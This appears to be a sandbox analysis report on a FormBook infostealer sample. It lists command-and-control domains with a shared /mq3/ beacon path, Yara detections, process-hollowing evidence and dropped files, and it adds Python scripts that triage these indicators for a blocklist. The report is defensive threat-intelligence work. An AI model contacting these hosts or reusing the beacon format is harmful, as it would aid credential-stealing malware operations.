65 2e 
63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.560432526.0000000002630000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adob1
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/www.tams.rocks
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.3dcellmodelscongress.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.com/mq3/www.askcopdtreatmentok.live
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.aaronnational.comReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/www.snagabag31.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.askcopdtreatmentok.liveReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/www.porcber.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.icbjesusdenazaret.netReferer:
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.net/mq3/www.aaronnational.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.operatorcloud.netReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.porcber.com/mq3/www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocksReferer:
          Source: ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/S
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltdReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmpString found in binary or memory: https://github.com/KamilBest/2048Game
          Source: NETSTAT.EXE, 00000006.00000002.1159788515.0000000002E38000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR

Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
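The URL list above mixes two very different things: FormBook's C2/decoy domains, all sharing the `/mq3/` URI path and found only in the mid-run dump of explorer.exe and in NETSTAT.EXE (both injected into), and font-vendor strings (goodfont.co.kr, sandoll.co.kr, sakkal.com, typography.net, ...) that are also present in the dump taken of explorer.exe at process start, before any injection, so they are system baseline and should not be blocked. The following Python is an added triage example and not part of the sandbox report. It assumes the dump-name layout `<pid>.<phase>.<id>.<base>.<protect>.<type>.sdmp` with phase 0 being the start-of-process dump; the `/mq3/` path is taken from the rows above; treating the host that a `/mq3/` string runs into as the adjacent entry of the same list is an analyst heuristic, not something the report states. The input rows are copied from the list above in the layout used on this page.

```python
"""Triage the 'String found in binary or memory' rows of this report.

Added example, not part of the sandbox report. Constructed input: seven rows
copied from the list above in the 'Source: ... | String found ...' layout.
Assumption about the dump names: <pid>.<phase>.<id>.<base>.<protect>.<type>.sdmp,
with phase 0 = dump taken at process start (before any injection), 2 = final.
"""
import re
from urllib.parse import urlsplit

ROWS = """\
Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.greenerpharms.comReferer:
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp | String found in binary or memory: http://www.hugoph.com/mq3/
Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp | String found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd
Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/KamilBest/2048Game
Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmp | String found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR
"""

ROW_RE = re.compile(r"^Source: (?P<sources>.+?) \| String found in binary or memory: (?P<url>\S+)$")
HOST_RE = re.compile(r"^www\.[a-z0-9-]+(\.[a-z0-9-]+)+$")
C2_PATH = "/mq3/"   # URI path shared by every C2/decoy entry in this report


def parse_sources(field):
    """'proc, dump, proc, dump, ...' -> [(proc, pid, phase)] with pid/phase as ints."""
    parts = [p.strip() for p in field.split(",")]
    out = []
    for proc, dump in zip(parts[0::2], parts[1::2]):
        pid, phase = dump.split(".")[:2]
        out.append((proc, int(pid, 16), int(phase, 16)))
    return out


def host_of(url):
    """Hostname as the extractor emitted it, minus the HTTP header name the
    extractor ran the URL into (the '...comReferer:' rows above)."""
    host = urlsplit(url).netloc.lower()
    if host.endswith("referer:"):
        host = host[: -len("referer:")]
    return host


def triage(text):
    """Split hosts into C2 candidates, process baseline and everything else."""
    seen = {}          # host -> True if any source is a start-of-process (phase 0) dump
    c2 = set()
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        host = host_of(url)
        at_start = any(phase == 0 for _, _, phase in parse_sources(m.group("sources")))
        seen[host] = seen.get(host, False) or at_start
        path = urlsplit(url).path
        if path.startswith(C2_PATH):
            c2.add(host)
            # Heuristic: a /mq3/ string that runs into another 'www.' host has read
            # past its terminator into the neighbouring list entry; count it too.
            trailer = path[len(C2_PATH):]
            if HOST_RE.match(trailer):
                c2.add(trailer)
    baseline = {h for h, start in seen.items() if start}
    c2 -= baseline
    other = set(seen) - baseline - c2
    return {"c2": c2, "baseline": baseline, "other": other}


if __name__ == "__main__":
    for bucket, hosts in triage(ROWS).items():
        print(f"{bucket}: {sorted(hosts)}")
```

Run against the seven rows this yields five C2 candidates (greenerpharms.com, sj233.com, hugoph.com, tams.rocks, yoxi.ltd), one baseline host (goodfont.co.kr) and github.com as unclassified; feeding it the full list above gives the complete blocklist for this sample without the eight font-vendor domains.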

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
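The Yara hit list is more useful once grouped by process: the payload matches at 0x400000 with protection 0x40 in process 4 (the second Scan_06032020.exe instance) and process 17 (the dropped ufipp6ljxlz.exe), which is what a hollowed 32-bit image looks like, while process 0 only holds the payload in a 0x04 (read-write) region, i.e. as data being unpacked, and process 6 (NETSTAT.EXE) carries it in an injected executable region away from its image base. The following Python is an added example, not part of the sandbox report. It assumes the identifier layouts `<pid>.<phase>.<id>.<base>.<protect>.<type>.sdmp` for MEMORY sources, with `<protect>` being the Windows PAGE_* constant, and `<pid>.<phase>.<image>.<base>.<n>[.raw].unpack` for UNPACKEDPE sources; neither convention is documented on this page. Input rows are the fifteen matches above.

```python
"""Pivot the Yara hits of this report by process.

Added example, not part of the sandbox report. Constructed input: the fifteen
'Yara match' rows listed above. Assumptions about the identifiers (not documented
on this page):
  MEMORY      <pid>.<phase>.<id>.<base>.<protect>.<type>.sdmp, hex fields, <protect>
              being the Windows PAGE_* constant (0x40 = PAGE_EXECUTE_READWRITE)
  UNPACKEDPE  <pid>.<phase>.<image>.<base>.<n>[.raw].unpack, decimal pid and phase
"""
import re

ROWS = """\
Source: Yara match | File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
"""

ROW_RE = re.compile(r"File source: (?P<ident>\S+), type: (?P<kind>MEMORY|UNPACKEDPE)$")
PAGE_EXECUTE_READWRITE = 0x40
DEFAULT_IMAGE_BASE = 0x400000   # default base of a 32-bit EXE; a hollowed payload is written back here


def parse_ident(ident, kind):
    """Decode one source identifier into pid, image name, base and protection."""
    f = ident.split(".")
    if kind == "MEMORY":
        return {"pid": int(f[0], 16), "image": None,
                "base": int(f[3], 16), "protect": int(f[4], 16)}
    tail = 4 if f[-2] == "raw" else 3          # '<base>.<n>.raw.unpack' or '<base>.<n>.unpack'
    return {"pid": int(f[0]), "image": ".".join(f[2:-tail]),
            "base": int(f[-tail], 16), "protect": None}


def summarize(text):
    """{pid: {image, regions={(base, protect)}, rwx_at_image_base}} over all rows."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        hit = parse_ident(m.group("ident"), m.group("kind"))
        p = procs.setdefault(hit["pid"], {"image": None, "regions": set(), "rwx_at_image_base": False})
        if hit["image"]:
            p["image"] = hit["image"]
        if hit["protect"] is not None:
            p["regions"].add((hit["base"], hit["protect"]))
            # RWX payload sitting exactly at the default image base: the original
            # image was unmapped and replaced, i.e. the hollowing the report flags.
            if hit["protect"] == PAGE_EXECUTE_READWRITE and hit["base"] == DEFAULT_IMAGE_BASE:
                p["rwx_at_image_base"] = True
    return procs


if __name__ == "__main__":
    for pid, p in sorted(summarize(ROWS).items()):
        regions = ", ".join(f"0x{b:X}/0x{pr:02X}" for b, pr in sorted(p["regions"]))
        print(f"pid {pid:2d} {p['image'] or '?':20s} hollowed={p['rwx_at_image_base']} {regions}")
```

Processes 16 and 18 show up with memory hits only (no unpacked PE), so their names have to be taken from other parts of the report; the function leaves `image` as `None` rather than guessing.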

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.ini
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrf.ini
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
